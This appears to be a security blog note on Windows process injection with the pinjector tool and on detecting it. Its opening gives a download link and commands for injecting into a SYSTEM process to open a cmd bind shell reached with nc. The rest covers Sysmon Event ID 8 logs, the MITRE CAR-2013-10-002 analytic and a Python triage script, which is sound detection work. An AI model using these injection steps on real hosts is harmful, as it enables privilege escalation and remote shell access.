Process injection data collection: Sysmon records CreateRemoteThread (Event ID 8); how CAR detects process injection
Download: https://www.tarasco.org/security/Process_Injector/processinjector.zip
Privilege escalation via process injection (pinjector.exe)
Process injection places pinjector's code inside one of the user's running processes, where it executes alongside that process and therefore runs with the same token and privileges.
It is a relatively covert technique: the injected code runs inside an existing process rather than as a process of its own, so it is hard to spot in a process list. The binary itself, however, is likely to be flagged by antivirus when it is uploaded to the target host.
Download pinjector.exe from http://www.tarasco.org/security/Process_Injector/.
Copy it to the root of the C: drive on the host.
pinjector.exe -l lists the running processes together with the account each one runs as; any listed process can be targeted (look for one running as SYSTEM).
pinjector.exe -p 456 cmd 5959 injects into PID 456 and starts cmd listening on port 5959, which is then reached with a tool such as nc.
Trying it on my own machine:
D:\bonelee\processinjector\Process Injector>pinjector -p 12304 cmd.exe 6688
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com
[+] Trying to execute cmd.exe to 12304 as: DESKTOP-PTV6LGO \ admin
[+] Code inyected... ; )
D:\tmp\processinjector\Process Injector>Pinjector64.exe
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com
Usage: inject.exe -l (Enumerate Credentials)
       inject.exe -p <pid> <cmd> <port> (Inject into PID)
D:\tmp\processinjector\Process Injector>Pinjector64.exe -p 30432 cmd.exe 9999
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com
[+] Trying to execute cmd.exe to 30432 as: xxx
[+] Code inyected... ; )
D:\tmp\processinjector\Process Injector>nc localhost 9999
'nc' is not recognized as an internal or external command, operable program or batch file.
Collecting the data with Sysmon (CreateRemoteThread is Event ID 8):
CreateRemoteThread detected:
RuleName: -
UtcTime: 2022-04-19 09:57:20.846
SourceProcessGuid: {7f59fefd-8780-625e-c811-000000002700}
SourceProcessId: 3940
SourceImage: D:\bonelee\processinjector\Process Injector\pinjector.exe
TargetProcessGuid: {7f59fefd-333e-625e-6f02-000000002700}
TargetProcessId: 12304
TargetImage: C:\Program Files (x86)\Notepad++\notepad++.exe
NewThreadId: 2224
StartAddress: 0x0000000003900000
StartModule: -
StartFunction: -
SourceUser: DESKTOP-PTV6LGO\admin
TargetUser: DESKTOP-PTV6LGO\admin
Two things in this event are worth noting. StartModule and StartFunction are both "-": the new thread starts at 0x0000000003900000, an address Sysmon could not map to any module loaded in notepad++.exe, which is what an injector that writes its own code into the target produces. That also means the LoadLibraryA/LoadLibraryW filter in the CAR analytic below would not fire on this event; the unbacked start address together with the non-system SourceImage is the signal here. And SourceUser equals TargetUser, because in this test the target was a notepad++.exe running as the same admin account rather than a SYSTEM process, so no privilege was actually gained.
CAR's description of how this kind of process injection is detected: https://car.mitre.org/analytics/CAR-2013-10-002/
CAR-2013-10-002: DLL Injection via Load Library
Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.
- Allocate memory in the target program with VirtualAllocEx
- Write the name of the DLL to inject into this program with WriteProcessMemory
- Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.
This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.
ATT&CK Detections
Technique | Subtechnique(s) | Tactic(s) | Level of Coverage |
---|---|---|---|
Process Injection | Dynamic-link Library Injection | Defense Evasion | Moderate |
Abuse Elevation Control Mechanism | Bypass User Account Control | Privilege Escalation | Moderate |
D3FEND Techniques
ID | Name |
---|---|
D3-SCA | System Call Analysis |
Data Model References
Object | Action | Field |
---|---|---|
thread | remote_create | src_pid |
thread | remote_create | start_function |
Implementations
Pseudocode
Search for remote thread creations that start at LoadLibraryA or LoadLibraryW. Depending on the tool, it may provide additional information about the DLL string that is an argument to the function. If there is any security software that legitimately injects DLLs, it must be carefully whitelisted.
remote_thread = search Thread:RemoteCreate
remote_thread = filter (start_function == "LoadLibraryA" or start_function == "LoadLibraryW")
remote_thread = filter (src_image_path != "C:\Path\To\TrustedProgram.exe")
output remote_thread
Logpoint, LogPoint native
LogPoint version of the above pseudocode.
norm_id=WindowsSysmon event_id=8 start_function IN ["LoadLibraryA", "LoadLibraryW"] -source_image="C:\Path\To\TrustedProgram.exe"
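As an added example (not code from this page, from Sysmon or from MITRE CAR), the following Python runs the CAR-2013-10-002 logic over the "Key: value" message body that Sysmon writes for Event ID 8, using the two events that appear on this page (the pinjector test and the Mordor sample) plus one constructed event standing in for a hypothetical security product that injects via LoadLibraryW on purpose. It goes one step beyond the CAR pseudocode: an added heuristic, not part of the analytic, flags threads whose start address Sysmon could not attribute to any module (StartModule and StartFunction both "-"), which is exactly the case the LoadLibrary rule misses, and it reports whether the thread crosses a user boundary. The allow-list entries, the EDR image path and the EDR event are assumptions.

```python
"""Triage Sysmon Event ID 8 (CreateRemoteThread) messages.

Added example, not code from this page, Sysmon or MITRE CAR: it runs the
CAR-2013-10-002 logic over Sysmon's 'Key: value' message body and adds one
heuristic for start addresses Sysmon cannot map to a module. Allow-list
entries are placeholders.
"""

# Sample events. The first two are copied from this page (pinjector test, Mordor
# sample; GUID lines dropped from the second); the third is constructed to stand
# in for a security product that deliberately injects via LoadLibraryW.
PINJECTOR_EVENT = r"""CreateRemoteThread detected:
RuleName: -
UtcTime: 2022-04-19 09:57:20.846
SourceProcessGuid: {7f59fefd-8780-625e-c811-000000002700}
SourceProcessId: 3940
SourceImage: D:\bonelee\processinjector\Process Injector\pinjector.exe
TargetProcessGuid: {7f59fefd-333e-625e-6f02-000000002700}
TargetProcessId: 12304
TargetImage: C:\Program Files (x86)\Notepad++\notepad++.exe
NewThreadId: 2224
StartAddress: 0x0000000003900000
StartModule: -
StartFunction: -
SourceUser: DESKTOP-PTV6LGO\admin
TargetUser: DESKTOP-PTV6LGO\admin"""

MORDOR_EVENT = r"""CreateRemoteThread detected:
RuleName:
UtcTime: 2019-05-18 22:15:33.007
SourceProcessId: 5452
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessId: 3124
TargetImage: C:\Windows\System32\notepad.exe
NewThreadId: 7940
StartAddress: 0x00007FFECED8F220
StartModule: C:\Windows\System32\KERNEL32.DLL
StartFunction: LoadLibraryA"""

EDR_EVENT = r"""CreateRemoteThread detected:
SourceImage: C:\Program Files\TrustedEDR\edr.exe
TargetImage: C:\Windows\System32\notepad.exe
StartAddress: 0x00007FFECED8F2A0
StartModule: C:\Windows\System32\KERNEL32.DLL
StartFunction: LoadLibraryW
SourceUser: NT AUTHORITY\SYSTEM
TargetUser: DESKTOP-PTV6LGO\admin"""

# Hypothetical allow-list: csrss.exe is the legitimate source CAR cites; the
# EDR path is invented. Compare full lowercased image paths, never basenames.
TRUSTED_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\program files\trustededr\edr.exe",
}
LOADLIBRARY_ENTRY_POINTS = {"LoadLibraryA", "LoadLibraryW"}


def parse_event8(message):
    """Parse the message body into a dict; empty or missing values become '-',
    the marker Sysmon itself uses for fields it could not resolve."""
    fields = {}
    for line in message.splitlines():
        key, sep, value = line.partition(":")  # first ':' ends the key
        if sep and not key.startswith("CreateRemoteThread"):
            fields[key.strip()] = value.strip() or "-"
    return fields


def source_is_trusted(ev):
    return ev.get("SourceImage", "-").lower() in TRUSTED_SOURCE_IMAGES


def matches_car_2013_10_002(ev):
    """CAR-2013-10-002 as written: entry point LoadLibraryA/W, untrusted source."""
    return ev.get("StartFunction") in LOADLIBRARY_ENTRY_POINTS and not source_is_trusted(ev)


def starts_in_unbacked_memory(ev):
    """Added heuristic (not in CAR): the thread starts at an address Sysmon
    could not map to any module, i.e. code the source wrote into the target
    itself, which is what the pinjector event on the page looks like."""
    return (ev.get("StartModule", "-") == "-" and ev.get("StartFunction", "-") == "-"
            and not source_is_trusted(ev))


def crosses_user_boundary(ev):
    """True if source and target run as different accounts (newer Sysmon
    versions add SourceUser/TargetUser); None when the event lacks them."""
    if "SourceUser" not in ev or "TargetUser" not in ev:
        return None
    return ev["SourceUser"].lower() != ev["TargetUser"].lower()


def triage(message):
    ev = parse_event8(message)
    rules = (("CAR-2013-10-002", matches_car_2013_10_002),
             ("unbacked-start-address", starts_in_unbacked_memory))
    return {"source": ev.get("SourceImage"), "target": ev.get("TargetImage"),
            "crosses_user_boundary": crosses_user_boundary(ev),
            "hits": [name for name, rule in rules if rule(ev)]}


if __name__ == "__main__":
    for name, msg in (("pinjector", PINJECTOR_EVENT), ("mordor", MORDOR_EVENT), ("edr", EDR_EVENT)):
        print(name, triage(msg))
```

Running the block prints one triage dict per event: the pinjector event matches only the added unbacked-start-address heuristic, the Mordor event only CAR-2013-10-002, and the allow-listed EDR event nothing even though it crosses from SYSTEM into a user process. Allow-listing must be by full image path (better still, by signer or hash), since the entry point and the source binary's location are both under the control of anyone who can already run code as that user.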
True Positives
Mordor (sysmon)
Sysmon event from the Mordor Empire DLL Injection dataset.
Event Snippet
{
"@event_date_creation": "2019-05-18T22:15:33.007Z",
"@timestamp": "2019-05-18T22:15:33.697Z",
"@version": "1",
"action": "createremotethread",
"event_id": 8,
"log_ingest_timestamp": "2019-05-18T22:15:33.697Z",
"log_name": "Microsoft-Windows-Sysmon/Operational",
"opcode": "Info",
"process_guid": "03ba39f5-50b2-5ce0-0000-00109995c501",
"process_id": "5452",
"process_name": "powershell.exe",
"process_path": "c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe",
"process_target_guid": "03ba39f5-8320-5ce0-0000-00101ec72502",
"process_target_id": "3124",
"process_target_name": "notepad.exe",
"process_target_path": "c:\\\\windows\\\\system32\\\\notepad.exe",
"provider_guid": "5770385f-c22a-43e0-bf4c-06f5698ffbd9",
"record_number": "2273503",
"source_name": "Microsoft-Windows-Sysmon",
"task": "CreateRemoteThread detected (rule: CreateRemoteThread)",
"thread_id": 3144,
"thread_new_id": "7940",
"thread_start_address": "0x00007FFECED8F220",
"thread_start_function": "LoadLibraryA",
"thread_start_module": "C:\\\\Windows\\\\System32\\\\KERNEL32.DLL",
"type": "wineventlog",
"user_reporter_domain": "NT AUTHORITY",
"user_reporter_name": "SYSTEM",
"user_reporter_sid": "S-1-5-18",
"user_reporter_type": "User"
}
The full event as collected (the same Mordor sample, including the ingest pipeline metadata):
{
  "_index": "logs-endpoint-winevent-sysmon-2019.05.18",
  "_type": "_doc",
  "_id": "b3c3006563ea4a0c2cb4c43191ea10c28f794fbb",
  "_score": 1,
  "_source": {
    "process_guid": "03ba39f5-50b2-5ce0-0000-00109995c501",
    "user_reporter_domain": "NT AUTHORITY",
    "process_target_id": "3124",
    "beat_name": "WECserver",
    "beat_version": "6.7.0",
    "user_reporter_type": "User",
    "thread_id": 3144,
    "log_name": "Microsoft-Windows-Sysmon/Operational",
    "record_number": "2273503",
    "@event_date_creation": "2019-05-18T22:15:33.007Z",
    "log_ingest_timestamp": "2019-05-18T22:15:33.697Z",
    "@version": "1",
    "type": "wineventlog",
    "level": "Information",
    "user_reporter_name": "SYSTEM",
    "z_logstash_type": "wineventlog",
    "process_target_path": "c:\\\\windows\\\\system32\\\\notepad.exe",
    "process_target_guid": "03ba39f5-8320-5ce0-0000-00101ec72502",
    "version": 2,
    "@timestamp": "2019-05-18T22:15:33.697Z",
    "thread_start_address": "0x00007FFECED8F220",
    "process_target_name": "notepad.exe",
    "z_logstash_pipeline": [
      "0098", "fingerprint-0099-001", "fingerprint-0099-003", "winlogbeat_6-field_nest_cleanup",
      "1500", "1521", "1522", "1523_7", "1523_8", "1524_8", "1524_11", "1524_12", "1524_15",
      "1531", "1541_1", "1541_3", "1544_2", "1544_3", "1544_5", "1544_7",
      "winevent-hostname-cleanup", "winevent-user_reporter_name-is-machine-account",
      "copy-8802-001", "copy-8802-002"
    ],
    "task": "CreateRemoteThread detected (rule: CreateRemoteThread)",
    "opcode": "Info",
    "process_id": "5452",
    "host": { "name": "WECserver" },
    "source_name": "Microsoft-Windows-Sysmon",
    "event_id": 8,
    "provider_guid": "5770385f-c22a-43e0-bf4c-06f5698ffbd9",
    "thread_start_function": "LoadLibraryA",
    "action": "createremotethread",
    "process_name": "powershell.exe",
    "thread_new_id": "7940",
    "meta_user_reporter_name_is_machine": "false",
    "beat_hostname": "WECserver",
    "user_reporter_sid": "S-1-5-18",
    "process_path": "c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe",
    "z_original_message": "CreateRemoteThread detected:\\nRuleName: \\nUtcTime: 2019-05-18 22:15:33.007\\nSourceProcessGuid: {03ba39f5-50b2-5ce0-0000-00109995c501}\\nSourceProcessId: 5452\\nSourceImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\nTargetProcessGuid: {03ba39f5-8320-5ce0-0000-00101ec72502}\\nTargetProcessId: 3124\\nTargetImage: C:\\\\Windows\\\\System32\\\\notepad.exe\\nNewThreadId: 7940\\nStartAddress: 0x00007FFECED8F220\\nStartModule: C:\\\\Windows\\\\System32\\\\KERNEL32.DLL\\nStartFunction: LoadLibraryA",
    "user": { },
    "host_name": "hr001.shire.com",
    "thread_start_module": "C:\\\\Windows\\\\System32\\\\KERNEL32.DLL"
  },
  "fields": {
    "@timestamp": [ "2019-05-18T22:15:33.697Z" ],
    "@event_date_creation": [ "2019-05-18T22:15:33.007Z" ],
    "log_ingest_timestamp": [ "2019-05-18T22:15:33.697Z" ]
  }
}